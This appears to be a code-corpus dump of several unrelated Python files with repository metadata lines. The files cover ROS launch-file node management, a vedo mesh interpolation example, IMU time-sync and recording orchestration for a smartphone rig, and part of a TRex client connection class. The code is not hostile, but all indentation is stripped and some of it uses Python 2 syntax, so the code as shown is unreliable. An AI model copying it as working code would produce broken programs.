sys.argv.extend(self.argv)
if self.do_autostart:
rospy.set_param('~autostart', False)
# initialize the ROS services
# rospy.Service('~load', LoadLaunch, self.rosservice_load_launch)
self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload)
rospy.Service('~description', ListDescription, self.rosservice_description)
self.runService = None
'''@ivar: The service will be created on each load of a launch file to
inform the caller about a new configuration. '''
self.listService = None
'''@ivar: The service will be created on each load of a launch file to
inform the caller about a new configuration. '''
self.description_response = ListDescriptionResponse()
# variables to print the pending autostart nodes
self._pending_starts = set()
self._pending_starts_last_printed = set()
def _filter_args(self, argv):
afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:=']
result = []
for a in argv:
in_filter = False
for f in afilter:
if a.startswith(f):
in_filter = True
break
if ':=' not in a or in_filter:
continue
result.append(a)
return result
def load(self, delay_service_creation=0.):
'''
Load the launch file configuration
'''
with self.__lock:
self._pending_starts.clear()
# shutdown the services to inform the caller about a new configuration.
if self.runService is not None:
self.runService.shutdown('reload config')
self.runService = None
if self.listService is not None:
self.listService.shutdown('reload config')
self.listService = None
self.nodes = [] # the name of nodes with namespace
self.sensors = {} # sensor descriptions
launch_path = self.getPath(self.launch_file, self.package)
rospy.loginfo("loading launch file: %s", launch_path)
self.masteruri = self._masteruri_from_ros()
self.roscfg = ROSLaunchConfig()
loader = XmlLoader()
argv = self._filter_args(sys.argv)
# remove namespace from sys.argv to avoid load the launchfile info local namespace
sys.argv = list(argv)
# set the global environment to empty namespace
os.environ[ROS_NAMESPACE] = rospy.names.SEP
rospy.set_param('~argv_used', list(set(argv)))
loader.load(launch_path, self.roscfg, verbose=False, argv=argv)
# create the list with node names
for item in self.roscfg.nodes:
if item.machine_name and not item.machine_name == 'localhost':
machine = self.roscfg.machines[item.machine_name]
if roslib.network.is_local_address(machine.address):
self.nodes.append(roslib.names.ns_join(item.namespace, item.name))
else:
self.nodes.append(roslib.names.ns_join(item.namespace, item.name))
# get the robot description
self.description_response = dr = ListDescriptionResponse()
dr.robot_name = ''
dr.robot_type = ''
dr.robot_descr = ''
for param, p in self.roscfg.params.items():
if param.endswith('robots'):
if isinstance(p.value, list):
if len(p.value) > 0 and len(p.value[0]) != 5:
print("WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore", param)
else:
for entry in p.value:
try:
print(entry[0], rospy.get_param('/mastername', ''))
if not entry[0] or entry[0] == rospy.get_param('/mastername', ''):
dr.robot_name = self._decode(entry[2])
dr.robot_type = entry[1]
dr.robot_images = entry[3].split(',')
dr.robot_descr = self._decode(entry[4])
break
except:
pass
# get the sensor description
tmp_cap_dict = self.getCapabilitiesDesrc()
for machine, ns_dict in tmp_cap_dict.items():
if machine in self.roscfg.machines:
machine = self.roscfg.machines[machine].address
if not machine or roslib.network.is_local_address(machine):
for ns, group_dict in ns_dict.items():
for group, descr_dict in group_dict.items():
if descr_dict['nodes']:
cap = Capability()
cap.namespace = ns
cap.name = group
cap.type = descr_dict['type']
cap.images = list(descr_dict['images'])
cap.description = descr_dict['description']
cap.nodes = list(descr_dict['nodes'])
dr.capabilities.append(cap)
# load parameters into the ROS parameter server
if self.load_params_at_start:
self.loadParams()
# initialize the ROS services
# HACK to let the node_manager to update the view
if delay_service_creation > 0.:
t = threading.Timer(delay_service_creation, self._timed_service_creation)
t.start()
else:
self._timed_service_creation()
# self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True)
# if self.nodes:
# self.runService = rospy.Service('~run', Task, self.rosservice_start_node)
# self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)
# except:
# import traceback
# print traceback.format_exc()
if self.do_autostart:
if not self.parameter_loaded:
self.loadParams()
for n in self.nodes:
try:
self.runNode(n, self.do_autostart)
except Exception as e:
rospy.logwarn("Error while start %s: %s", n, e)
self.do_autostart = False
def _decode(self, val):
'''
Replaces the '\\n' by LF (Line Feed) and decode the string entry from system default
coding to unicode.
@param val: the string coding as system default
@type val: str
@return: the decoded string
@rtype: C{unicode} or original on error
'''
result = val.replace("\\n ", "\n")
try:
result = result.decode(sys.getfilesystemencoding())
except:
pass
return result
def getCapabilitiesDesrc(self):
'''
Parses the launch file for C{capabilities} and C{capability_group} parameter
and creates dictionary for grouping the nodes.
@return: the capabilities description stored in this configuration
@rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))}
'''
result = dict()
capabilies_descr = dict()
if self.roscfg is not None:
# get the capabilities description
# use two separate loops, to create the description list first
for param, p in self.roscfg.params.items():
if param.endswith('capabilities'):
if isinstance(p.value, list):
if len(p.value) > 0 and len(p.value[0]) != 4:
print("WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore", param)
else:
for entry in p.value:
capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])}
# get the capability nodes
for item in self.roscfg.nodes:
node_fullname = roslib.names.ns_join(item.namespace, item.name)
machine_name = item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else ''
added = False
cap_param = roslib.names.ns_join(node_fullname, 'capability_group')
cap_ns = node_fullname
# find the capability group parameter in namespace
while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1:
cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP)
if not cap_ns:
cap_ns = roslib.names.SEP
cap_param = roslib.names.ns_join(cap_ns, 'capability_group')
if cap_ns == node_fullname:
cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to the group
if not cap_ns:
cap_ns = roslib.names.SEP
# if the 'capability_group' parameter found, assign node to the group
if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value:
p = self.roscfg.params[cap_param]
if machine_name not in result:
result[machine_name] = dict()
for (ns, groups) in result[machine_name].items():
if ns == cap_ns and p.value in groups:
groups[p.value]['nodes'].append(node_fullname)
added = True
break
if not added:
ns = cap_ns
# add new group in the namespace of the node
if ns not in result[machine_name]:
result[machine_name][ns] = dict()
if p.value not in result[machine_name][ns]:
try:
result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'],
'images': capabilies_descr[p.value]['images'],
'description': capabilies_descr[p.value]['description'],
'nodes': []}
except:
result[machine_name][ns][p.value] = {'type': '',
'images': [],
'description': '',
'nodes': []}
result[machine_name][ns][p.value]['nodes'].append(node_fullname)
return result
def _masteruri_from_ros(self):
'''
Returns the master URI depending on ROS distribution API.
@return: ROS master URI
@rtype: C{str}
'''
try:
import rospkg.distro
distro = rospkg.distro.current_distro_codename()
if distro in ['electric', 'diamondback', 'cturtle']:
return roslib.rosenv.get_master_uri()
else:
return rosgraph.rosenv.get_master_uri()
except:
return roslib.rosenv.get_master_uri()
def _timed_service_creation(self):
with self.__lock:
try:
if self.runService is None:
self.runService = rospy.Service('~run', Task, self.rosservice_start_node)
if self.listService is None:
self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)
except:
import traceback
print(traceback.format_exc())
def getPath(self, path, package=''):
'''
Searches for a launch file. If package is given, try first to find the launch
file in the given package. If more then one launch file with the same name
found in the package, the first one will be tacked.
@param path: the file name of the launch file
@type path: C{str}
@param package: the package containing the launch file or an empty string,
if the C{file} is an absolute path
@type package: C{str}
@return: the absolute path of the launch file
@rtype: C{str}
@raise LoadException: if the given file is not found
'''
launch_file = path
# if package is set, try to find the launch file in the given package
if package:
paths = roslib.packages.find_resource(package, launch_file)
if len(paths) > 0:
# if more then one launch file is found, take the first one
launch_file = paths[0]
if os.path.isfile(launch_file) and os.path.exists(launch_file):
return launch_file
raise LoadException('File %s in package [%s] not found!' % (path, package))
def rosservice_list_nodes(self, req):
'''
Callback for the ROS service to get the list with available nodes.
'''
return ListNodesResponse(self.nodes)
def rosservice_start_node(self, req):
'''
Callback for the ROS service to start a node.
'''
self.runNode(req.node)
return []
def rosservice_reload(self, req):
self.load(2.)
return []
# def rosservice_load_launch(self, req):
# '''
# Load the launch file
# '''
# try:
# self.__lock.acquire()
# self.load(req.package, req.file, req.argv)
# finally:
# self.__lock.release()
# return []
def rosservice_description(self, req):
'''
Returns the current description.
'''
return self.description_response
def loadParams(self):
'''
Loads all parameter into ROS parameter server.
'''
params = dict()
for param, value in self.roscfg.params.items():
params[param] = value
# rospy.loginfo("register PARAMS:\n%s", '\n'.join(params))
self._load_parameters(self.masteruri, params, self.roscfg.clear_params)
self.parameter_loaded = True
def runNode(self, node, autostart=False):
'''
Start the node with given name from the currently loaded configuration.
@param node: the name of the node
@type node: C{str}
@raise StartException: if an error occurred while start.
'''
if not self.parameter_loaded:
self.loadParams()
n = None
for item in self.roscfg.nodes:
itemname = rospy.names.ns_join(item.namespace, item.name)
if itemname == node:
n = item
break
if n is None:
raise StartException("Node '%s' not found!" % node)
if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)):
# skip autostart
rospy.loginfo("%s is in exclude list, skip autostart", n.name)
return
# env = n.env_args
prefix = n.launch_prefix if n.launch_prefix is not None else ''
args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name]
if not (n.cwd is None):
args.append('__cwd:=%s' % n.cwd)
# add remaps
for remap in n.remap_args:
args.append('%s:=%s' % (remap[0], remap[1]))
# masteruri = self.masteruri
# if n.machine_name and not n.machine_name == 'localhost':
# machine = self.roscfg.machines[n.machine_name]
# TODO: env-loader support?
# if machine.env_args:
# env[len(env):] = machine.env_args
# nm.screen().testScreen()
cmd = self._get_node(n.package, n.type)
# determine the current working path, Default: the package of the node
cwd = self.get_ros_home()
if not (n.cwd is None):
if n.cwd == 'ROS_HOME':
cwd = self.get_ros_home()
elif n.cwd == 'node':
cwd = os.path.dirname(cmd[0])
respawn = ['']
if n.respawn:
respawn = self._get_node('node_manager_fkie', 'respawn')
# set the respawn environment variables
respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name))
if respawn_params['max'] > 0:
n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max']))
if respawn_params['min_runtime'] > 0:
n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime']))
if respawn_params['delay'] > 0:
n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay']))
node_cmd = [respawn[0], prefix, cmd[0]]
cmd_args = [ScreenHandler.getSceenCmd(node)]
cmd_args[len(cmd_args):] = node_cmd
cmd_args.append(n.args)
cmd_args[len(cmd_args):] = args
# print 'runNode: ', cmd_args
popen_cmd = shlex.split(str(' '.join(cmd_args)))
rospy.loginfo("run node '%s as': %s", node, str(' '.join(popen_cmd)))
# remove the 'BASH_ENV' and 'ENV' from environment
new_env = dict(os.environ)
try:
for k in ['BASH_ENV', 'ENV']:
del new_env[k]
except:
pass
# add node environment parameter
for k, v in n.env_args:
new_env[k] = v
# the ROS_NAMESPACE environment is used in cpp plugins in rqt
if n.namespace:
new_env['ROS_NAMESPACE'] = n.namespace
# set delayed autostart parameter
self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart)
if len(cmd) > 1:
raise StartException('Multiple executables are found! The first one was started! Exceutables:\n%s' % str(cmd))
def _run_node(self, cmd, cwd, env, node, autostart=False):
self._pending_starts.add(node)
start_now = True
start_delay = self._get_start_delay(node)
start_required = self._get_start_required(node)
if autostart and start_required:
start_now = False
# get published topics from ROS master
master = rosgraph.masterapi.Master(self.masteruri)
for topic, datatype in master.getPublishedTopics(''):
if start_required == topic:
start_now = True
break
if not start_now:
# Start the timer for waiting for the topic
start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart))
start_timer.start()
if start_now and autostart and start_delay > 0:
start_now = False
# start timer for delayed start
start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False))
start_timer.start()
if start_now:
ps = subprocess.Popen(cmd, cwd=cwd, env=env)
# wait for process to avoid 'defunct' processes
thread = threading.Thread(target=ps.wait)
thread.setDaemon(True)
thread.start()
# remove from pending autostarts
try:
self._pending_starts.remove(node)
except:
pass
# print the current pending autostarts
if self._pending_starts_last_printed != self._pending_starts:
self._pending_starts_last_printed.clear()
self._pending_starts_last_printed.update(self._pending_starts)
rospy.loginfo("Pending autostarts %d: %s", len(self._pending_starts), self._pending_starts)
def _get_node(self, pkg, filename):
cmd = None
try:
cmd = roslib.packages.find_node(pkg, filename)
except roslib.packages.ROSPkgException as e:
# multiple nodes, invalid package
raise StartException(str(e))
except Exception as e:
raise StartException(str(e))
# handle different result types str or array of string
if sys.version_info[0] <= 2:
import types
string_types = types.StringTypes
else:
string_types = (str,)
if isinstance(cmd, string_types):
cmd = [cmd]
if cmd is None or len(cmd) == 0:
raise StartException('%s in package [%s] not found!' % (filename, pkg))
return cmd
def _get_start_exclude(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude')
try:
return bool(self.roscfg.params[param_name].value)
except:
pass
return False
def _get_start_delay(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay')
try:
return float(self.roscfg.params[param_name].value)
except:
pass
return 0.
def _get_start_required(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher')
topic = ''
try:
topic = self.roscfg.params[param_name].value
if rosgraph.names.is_private(topic):
rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic)
topic = ''
elif not rosgraph.names.is_global(topic):
topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic)
except:
pass
return topic
def _get_respawn_params(self, node):
result = {'max': 0, 'min_runtime': 0, 'delay': 0}
respawn_max = rospy.names.ns_join(node, 'respawn/max')
respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime')
respawn_delay = rospy.names.ns_join(node, 'respawn/delay')
try:
result['max'] = int(self.roscfg.params[respawn_max].value)
except:
pass
try:
result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value)
except:
pass
try:
result['delay'] = int(self.roscfg.params[respawn_delay].value)
except:
pass
return result
def get_ros_home(self):
'''
Returns the ROS HOME path depending on ROS distribution API.
@return: ROS HOME path
@rtype: C{str}
'''
try:
import rospkg.distro
distro = rospkg.distro.current_distro_codename()
if distro in ['electric', 'diamondback', 'cturtle']:
import roslib.rosenv
return roslib.rosenv.get_ros_home()
else:
import rospkg
return rospkg.get_ros_home()
except:
import traceback
print(traceback.format_exc())
import roslib.rosenv
return roslib.rosenv.get_ros_home()
@classmethod
def _load_parameters(cls, masteruri, params, clear_params):
"""
Load parameters onto the parameter server
"""
try:
import xmlrpclib
except ImportError:
import xmlrpc.client as xmlrpclib
param_server = xmlrpclib.ServerProxy(masteruri)
p = None
try:
# multi-call style xmlrpc
param_server_multi = xmlrpclib.MultiCall(param_server)
# clear specified parameter namespaces
# #2468 unify clear params to prevent error
for p in clear_params:
param_server_multi.deleteParam(rospy.get_name(), p)
r = param_server_multi()
# for code, msg, _ in r:
# if code != 1:
# raise StartException("Failed to clear parameter: %s"%(msg))
# multi-call objects are not reusable
param_server_multi = xmlrpclib.MultiCall(param_server)
for p in params.itervalues():
# suppressing this as it causes too much spam
# printlog("setting parameter [%s]"%p.key)
param_server_multi.setParam(rospy.get_name(), p.key, p.value)
r = param_server_multi()
for code, msg, _ in r:
if code != 1:
raise StartException("Failed to set parameter: %s" % (msg))
except Exception:
raise # re-raise as this is fatal
| 1.070313 | 1 |
examples/advanced/interpolateScalar4.py | mikami520/vedo | 1 | 12794311 | <gh_stars>1-10
"""Interpolate cell values from a quad-mesh to a tri-mesh"""
from vedo import Grid, show
# Make up some quad mesh with associated scalars
g1 = Grid(res=(25,25)).wireframe(0).lw(1)
scalars = g1.points()[:,1]
g1.cmap("viridis", scalars, vmin=-1, vmax=1, name='gene')
g1.mapPointsToCells() # move the array to cells (faces)
g1.addScalarBar(horizontal=1, pos=(0.7,0.04))
g1.rotateZ(20) # let's rotate it a bit so it's visible
# Interpolate first mesh onto a new triangular mesh
eps = 0.01
g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0)
g2.triangulate()
# Interpolate by averaging the closest 3 points:
#g2.interpolateDataFrom(g1, on='cells', N=3)
# Interpolate by picking points in a specified radius,
# if there are no points in that radius set null value -1
g2.interpolateDataFrom(
g1,
on='cells',
radius=0.1+eps,
nullStrategy=1,
nullValue=-1,
)
g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar()
show(g1, g2, __doc__, axes=1)
| 2.46875 | 2 |
master.py | MobileRoboticsSkoltech/bandeja-wrapper | 0 | 12794312 | <reponame>MobileRoboticsSkoltech/bandeja-wrapper
import time
from src.RemoteControl import RemoteControl
from concurrent.futures import ThreadPoolExecutor
import subprocess
import rospy
from sensor_msgs.msg import Imu, CameraInfo, TimeReference
import numpy as np
import pandas as pd
from io import StringIO
from src.TimeSync import TimeSync2
import matplotlib as mpl
#mpl.use('TkAgg')
import matplotlib.pyplot as plt
import signal
import sys
import select
import os
HOST = None # The smartphone's IP address
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def print_master(string):
print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC)
def print_master_error(string):
print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC)
subpr_list = []
mcu_imu_time = []
mcu_imu_data = []
depth_cam_ts = None
mcu_cam_ts = None
mcu_cam_ts_common = None
remote = None
def mcu_imu_callback(data):
dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9
mcu_imu_time.append(dat)
dat = data.angular_velocity
mcu_imu_data.append([dat.x, dat.y, dat.z])
def depth_cam_callback(data):
if data.header.seq == 1:
global depth_cam_ts
depth_cam_ts = data.header.stamp
def mcu_cam_callback(data):
if data.header.seq == 12:
global mcu_cam_ts
mcu_cam_ts = data.header.stamp
global mcu_cam_ts_common
mcu_cam_ts_common = data.header.stamp
def main(args):
if len(args) == 1:
print 'Please, provide smartphone IP-address. For instance, 10.30.65.166'
sys.exit()
global HOST
HOST = args[1]
# Register SIGINT handler
def signal_handler(sig, frame):
print_master('Exiting')
running_subpr_list = []
for subpr in subpr_list:
if subpr is not None:
subpr.terminate()
running_subpr_list.append(subpr)
exit_codes = [p.wait() for p in running_subpr_list]
if remote is not None:
try:
remote.stop_video()
except:
pass
remote.close()
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
# Starting smartphone remote control
global remote
remote = RemoteControl(HOST)
# Launching ROS data collection nodes
launch_subprocess = subprocess.Popen("roslaunch data_collection data_collection_ns.launch".split())
subpr_list.append(launch_subprocess)
# Wait until .launch launched completely
time.sleep(2)
while True:
print_master('Tap Enter to start Twist-n-Sync alignment process')
input = select.select([sys.stdin], [], [], 2)[0]
if input:
value = sys.stdin.readline().rstrip()
if (value == ""):
break
rospy.init_node('master', anonymous=True)
# 1. Twist-n-Sync
start_duration = 1
main_duration = 4
end_duration = 4
# Wait to avoid shaking
time.sleep(1)
# Gathering MCU and smartphone IMU data
with ThreadPoolExecutor(max_workers=1) as executor:
print_master('IMUs gathering started. Wait, please')
future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False)
#mcu_imu_listener()
mcu_imu_listener = rospy.Subscriber("mcu_imu", Imu, mcu_imu_callback)
time.sleep(start_duration)
print_master('Start shaking')
time.sleep(main_duration)
print_master('Put back')
time.sleep(end_duration)
#rospy.signal_shutdown('it is enough')
mcu_imu_listener.unregister()
print_master('AAA')
_, sm_ascii_gyro_data, _ = future.result()
print_master('IMUs gathering finished')
# Get data from mcu imu
mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition
mcu_gyro_time = np.asarray(mcu_imu_time)
#print(gyro_data[:200]) # Show the problem of the first measurement
# Get data from s10 imu
sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False)
sm_gyro_data = sm_df.iloc[1:, :3].to_numpy()
sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9
# Equalize lengths
min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0])
mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \
mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \
sm_gyro_data[:min_length], sm_gyro_time[:min_length]
# Obtain offset
time_sync2 = TimeSync2(
mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False
)
time_sync2.resample(accuracy=1)
time_sync2.obtain_delay()
# Check if IMU calibration and consequently TimeSync has succeeded
if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None:
print('IMU data calibration failed. Exiting')
remote.close()
launch_subprocess.terminate()
launch_subprocess.wait()
sys.exit()
comp_delay2 = time_sync2.time_delay
M = time_sync2.M
# Compute resulting offset
sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2)
# Show mean of omegas to visually oversee sync performance
plt.ion()
plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1))
plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--')
plt.show()
plt.pause(2)
plt.close()
# 2. Azure camera alignment
depth_cam_listener = rospy.Subscriber("/azure/depth/camera_info", CameraInfo, depth_cam_callback)
mcu_cam_listener = rospy.Subscriber("/mcu_cameras_ts", TimeReference, mcu_cam_callback)
# Send start_mcu_cam_triggering command to mcu via mcu.cpp
cam_align_subprocess = subprocess.Popen("rosrun mcu_interface start_mcu_cam_trigger_client".split())#subpr_list.append(cam_align_subprocess)
cam_align_subprocess.wait()
# Some time needed to get a camera frame and its info in mcu.cpp
time.sleep(0.1)
publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10)
global depth_cam_ts
global mcu_cam_ts
time_sleep_duration = 0.01
time_past = 0
while mcu_cam_ts == None or depth_cam_ts == None:
time.sleep(time_sleep_duration)
time_past += time_sleep_duration
if time_past == 3:
print('Timeout reached. Exiting')
mcu_cam_listener.unregister()
publisher_depth_to_mcu_offset.unregister()
depth_cam_listener.unregister()
remote.close()
sys.exit()
depth_cam_listener.unregister()
#mcu_cam_listener.unregister()
msg = TimeReference()
msg.header.frame_id = "mcu_depth_ts"
msg.header.stamp = mcu_cam_ts#[0]
msg.time_ref = depth_cam_ts#[0]
publisher_depth_to_mcu_offset.publish(msg)
print_master('Tap Enter to start recording')
raw_input()
# Start video on s10
sm_remote_ts_ns, sm_frame_period_ns = remote.start_video()
sm_remote_ts = sm_remote_ts_ns / 1e9;
sm_frame_period = sm_frame_period_ns / 1e9
# Compute mcu desired timestamp
mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset
'''
# Save some info
print "comp_delay2 ", comp_delay2
print "sm_mcu_clock_offset", sm_mcu_clock_offset
print "sm_remote_ts ", sm_remote_ts
#print "sm_frame_period ", sm_frame_period
print "np.mean(sm_gyro_time - mcu_gyro_time)", np.mean(sm_gyro_time - mcu_gyro_time)
print "sm_gyro_time[0] ", sm_gyro_time[0]
print "sm_gyro_time[-1] ", sm_gyro_time[-1]
print "mcu_gyro_time[0] ", mcu_gyro_time[0]
print "mcu_desired_ts ", mcu_desired_ts
with open("out/" + time.strftime("%b_%d_%Y_%H_%M_%S") + ".txt", "w+") as out:
out.writelines(
'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\n' + \
str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \
'\n'
)
'''
# Added for debugging
path = '/'.join( ('out', 'master', time.strftime("%m(%b)%d_%Y_%H%M%S")) )
os.mkdir(path)
#imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T)
#imu_data_frame.to_csv(
print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape)
pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv(
'/'.join( (path, 'imu_data.csv') ),
header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'],
index=False
)
#debug_data_frame = pd.DataFrame.from_dict({
pd.DataFrame.from_dict({
'comp_delay2' : [comp_delay2],
'sm_remote_ts' : [sm_remote_ts],
'sm_frame_period' :[sm_frame_period],
'mcu_desired_ts' : [mcu_desired_ts],
'sm_mcu_clock_offset' : [sm_mcu_clock_offset],
'M00' : M[0,0],
'M01' : M[0,1],
'M02' : M[0,2],
'M10' : M[1,0],
'M11' : M[1,1],
'M12' : M[1,2],
'M20' : M[2,0],
'M21' : M[2,1],
'M22' : M[2,2]
}).to_csv('/'.join( (path, 'debug_data.csv') ), index=False)
#debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False)
# Phase alignment
align_camera_subprocess = subprocess.Popen(("rosrun mcu_interface align_mcu_cam_phase_client " + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess)
align_camera_subprocess.wait()
# Some time needed to get camrera frame data by mcu.cpp
time.sleep(0.1)
# Send publish_s10_timestamp message to mcu.cpp
send_offset_subprocess = subprocess.Popen(("rosrun mcu_interface publish_s10_to_mcu_offset_client " + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess)
send_offset_subprocess.wait()
# 3. Record data
record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split())
subpr_list.append(record_subprocess)
time.sleep(1)
print_master('Recording is started')#\nPress Ctrl+C to stop recording along with everything and exit')
publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10)
#flag_to_process = True
sequence_num = 1
print_master('Current sequence number: ' + str(sequence_num))
print_master('Tap Enter to indicate the next sequence')
while True:
input = select.select([sys.stdin], [], [], 0.01)[0]
if input:
value = sys.stdin.readline().rstrip()
if (value == ""):
msg = TimeReference()
#msg.header.frame_id = "mcu_depth_ts"
msg.header.stamp = mcu_cam_ts_common
#msg.time_ref = depth_cam_ts
msg.source = str(sequence_num)
publisher_indicator.publish(msg)
sequence_num += 1
print_master('Current sequence: ' + str(sequence_num))
print_master('Tap Enter to indicate the next sequence')
time.sleep(0.01);
#remote.stop_video()
#remote.close()
#mcu_cam_listener.unregister()
#publisher_depth_to_mcu_offset.unregister()
if __name__ == '__main__':
main(sys.argv)
| 1.84375 | 2 |
scripts/automation/trex_control_plane/stl/trex_stl_lib/trex_stl_conn.py | alialnu/trex-core | 0 | 12794313 |
from .trex_stl_types import *
from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo
from .trex_stl_async_client import CTRexAsyncClient
import time
import signal
import os
############################ RPC layer #############################
############################ #############################
############################ #############################
class CCommLink(object):
"""Describes the connectivity of the stateless client method"""
def __init__(self, server="localhost", port=5050, virtual=False, client = None):
self.server = server
self.port = port
self.rpc_link = JsonRpcClient(self.server, self.port, client)
# API handler provided by the server
self.api_h = None
def get_server (self):
return self.server
def get_port (self):
return self.port
def connect(self):
return self.rpc_link.connect()
def disconnect(self):
self.api_h = None
return self.rpc_link.disconnect()
def transmit(self, method_name, params = None, retry = 0):
return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry)
def transmit_batch(self, batch_list, retry = 0):
batch = self.rpc_link.create_batch()
for command in batch_list:
batch.add(command.method, command.params, self.api_h)
# invoke the batch
return batch.invoke(retry = retry)
class Connection(object):
'''
Manages that connection to the server
connection state object
describes the connection to the server state
can be either fully disconnected, fully connected
or marked for disconnection
'''
DISCONNECTED = 1
CONNECTED = 2
MARK_FOR_DISCONNECT = 3
def __init__ (self, conn_info, logger, client):
self.conn_info = conn_info
self.logger = logger
self.sigint_on_conn_lost = False
# API classes
self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1}
# low level RPC layer
self.rpc = CCommLink(self.conn_info['server'],
self.conn_info['sync_port'],
self.conn_info['virtual'],
client)
self.async = CTRexAsyncClient(self.conn_info['server'],
self.conn_info['async_port'],
client)
# save pointers
self.conn_info = conn_info
# init state
self.state = (self.DISCONNECTED, None)
def disconnect (self):
'''
disconnect from both channels
sync and async
'''
try:
self.rpc.disconnect()
self.async.disconnect()
finally:
self.state = (self.DISCONNECTED, None)
def connect (self):
'''
connect to the server (two channels)
'''
# first disconnect if already connected
if self.is_connected():
self.disconnect()
# connect
rc = self.__connect()
if not rc:
self.disconnect()
return rc
def barrier (self):
'''
executes a barrier
when it retruns, an async barrier is guaranteed
'''
return self.async.barrier()
def sync (self):
'''
fully sync the client with the server
must be called after all the config
was done
'''
return self.async.barrier(baseline = True)
def mark_for_disconnect (self, cause):
'''
A multithread safe call
any thread can mark the current connection
as not valid
and will require the main thread to reconnect
'''
# avoid any messages handling for the async thread
self.async.set_as_zombie()
# change state
self.state = (self.MARK_FOR_DISCONNECT, cause)
# if the flag is on, a SIGINT will be sent to the main thread
# causing the ZMQ RPC to stop what it's doing and report an error
if self.sigint_on_conn_lost:
os.kill(os.getpid(), signal.SIGINT)
def sigint_on_conn_lost_enable (self):
'''
when enabled, if connection
is lost a SIGINT will be sent
to the main thread
'''
self.sigint_on_conn_lost = True
def sigint_on_conn_lost_disable (self):
'''
disable SIGINT dispatching
on case of connection lost
'''
self.sigint_on_conn_lost = False
def is_alive (self):
'''
return True if any data has arrived
the server in the last 3 seconds
'''
